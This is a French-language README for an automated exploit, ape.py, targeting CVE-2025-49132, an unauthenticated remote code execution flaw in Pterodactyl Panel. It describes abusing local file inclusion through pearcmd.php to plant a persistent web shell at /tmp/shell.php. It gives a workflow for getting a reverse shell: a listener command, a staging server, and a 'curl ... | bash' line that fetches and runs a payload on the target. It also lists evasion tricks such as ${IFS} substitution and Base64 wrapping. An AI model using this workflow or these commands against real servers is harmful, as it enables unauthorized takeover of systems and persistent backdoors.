
Exploit automatisé pour CVE-2025-49132, une RCE critique non authentifiée dans Pterodactyl Panel. Tire parti de LFI via locale endpoint pour déployer des web shells persistants et obtenir un accès reverse shell.
Ce dépôt contient un exploit spécialisé pour CVE-2025-49132, une vulnérabilité critique d'exécution de code à distance (RCE) sans authentification dans le panneau Pterodactyl (versions antérieures à v1.11.11).
La vulnérabilité réside dans le point de terminaison /locales/locale.json. En manipulant les paramètres de requête locale et namespace, un attaquant peut tirer parti d'une inclusion de fichier local (LFI) pour interagir avec pearcmd.php. Cela permet la création arbitraire de fichiers et l'exécution de commandes, conduisant à un compromis complet du système.
Le script ape.py automatise les étapes suivantes :
Découverte de PEAR : Fuzz la structure de répertoires pour localiser l'installation de PEAR sur la cible.
Création de backdoor : Utilise config-create de PEAR pour écrire un shell web persistant dans /tmp/shell.php.
Pour obtenir un callback réussi sur la cible, suivez ce flux de travail :
penelope -p 4444
Serveur de staging : Si vous utilisez un script shell personnalisé, hébergez-le via Python :
python3 -m http.server 8080
python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash
Contournement d'espaces : Utilise automatiquement ${IFS} pour garantir que les payloads survivent au parsing d'URL.
Encapsulation Base64 : Enveloppe les commandes de reverse shell en Base64 pour éviter la corruption des caractères par le serveur Nginx/Web cible.
Gestion des timeouts : Conçue pour détecter quand un reverse shell s'est connecté avec succès même si la requête web reste en attente.